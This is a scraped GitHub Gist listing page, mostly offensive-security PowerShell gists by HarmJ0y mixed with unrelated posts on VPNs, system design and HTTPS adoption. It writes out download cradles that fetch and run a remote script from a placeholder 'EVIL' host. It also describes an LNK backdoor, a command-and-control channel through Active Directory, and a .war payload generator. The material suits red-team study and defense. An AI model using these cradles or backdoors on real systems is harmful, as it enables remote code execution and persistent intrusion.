SkyN9ne SkyN9ne

@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active May 2, 2025 12:40
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@HarmJ0y
HarmJ0y / psWar.py
Created September 15, 2015 07:51
PsWar
#!/usr/bin/python
# Code that quickly generates a deployable .war for a PowerShell one-liner
import zipfile
import StringIO
import sys
def generatePsWar(psCmd, appName):
@HarmJ0y
HarmJ0y / Invoke-HostFile.ps1
Last active September 12, 2022 01:55
Host a single binary file without needing administrative privileges
Function Invoke-HostFile {
<#
.SYNOPSIS
Hosts a base64 string representation of a binary file or a given
$FilePath on the specified $Port. Any HTTP request to the given
host/port will return the binary data of the specified file.
.PARAMETER Base64File
@joepie91
joepie91 / vpn.md
Last active May 6, 2025 08:30
Don't use VPN services.

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using a VPN for its intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

  • A Russian translation of this article can be found here, contributed by Timur Demin.
  • A Turkish translation can be found here, contributed by agyild.
  • There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.
@vasanthk
vasanthk / System Design.md
Last active May 7, 2025 23:52
System Design Cheatsheet

System Design Cheatsheet

Picking the right architecture = Picking the right battles + Managing trade-offs

Basic Steps

  1. Clarify and agree on the scope of the system
  • User cases (description of sequences of events that, taken together, lead to a system doing something useful)
    • Who is going to use it?
    • How are they going to use it?
@HarmJ0y
HarmJ0y / Start-FileSystemMonitor.ps1
Last active April 23, 2025 13:23
Start-FileSystemMonitor
Function Start-FileSystemMonitor {
<#
.SYNOPSIS
This function will monitor one or more file paths for any file
creation, deletion, modification, or renaming events. Data including
the change type, ACL for the file, etc. is output to the screen or
a specified -LogFile.
If -InjectShellCmd is specified, the given command is inserted into
void TestCopy()
{
BOOL cond = FALSE;
IFileOperation *FileOperation1 = NULL;
IShellItem *isrc = NULL, *idst = NULL;
BIND_OPTS3 bop;
SHELLEXECUTEINFOW shexec;
HRESULT r;
do {
@Enegnei
Enegnei / HTTPShame.md
Last active April 7, 2025 22:05
A shame-list of popular websites which have not yet deployed HTTPS certificates

HTTPS vs HTTP

HTTPShame

A shame-list of popular or important websites which have not yet deployed HTTPS certificates by default.

Sites which may involve the transmission of very sensitive data, such as health or banking information, are marked with an ❗ to signal they should deploy HTTPS-by-default as soon as possible. If you are a popular website (such as those on the Alexa Top 500 Global Sites) which finds itself on this list - and you want to be removed - you can visit Let's Encrypt about transitioning to HTTPS. It's easy, free, and will help you learn how to protect your customers/readers!

List now outdated, removed until further notice.

Q: What is HTTPS?

@HarmJ0y
HarmJ0y / ADC2.ps1
Last active December 21, 2024 07:23
Command and Control channel through Active Directory Object Properties
#Requires -Version 2
function New-ADPayload {
<#
.SYNOPSIS
Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates
a one-line launcher.
Author: @harmj0y
@HarmJ0y
HarmJ0y / LNKBackdoor.ps1
Created July 4, 2016 20:49
Functions to 'backdoor' .LNK files with additional functionality and enumerate all 'backdoored' .LNKs on a system.
function Set-LNKBackdoor {
<#
.SYNOPSIS
Backdoors an existing .LNK shortcut to trigger the original binary and a payload specified by
-ScriptBlock or -Command.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None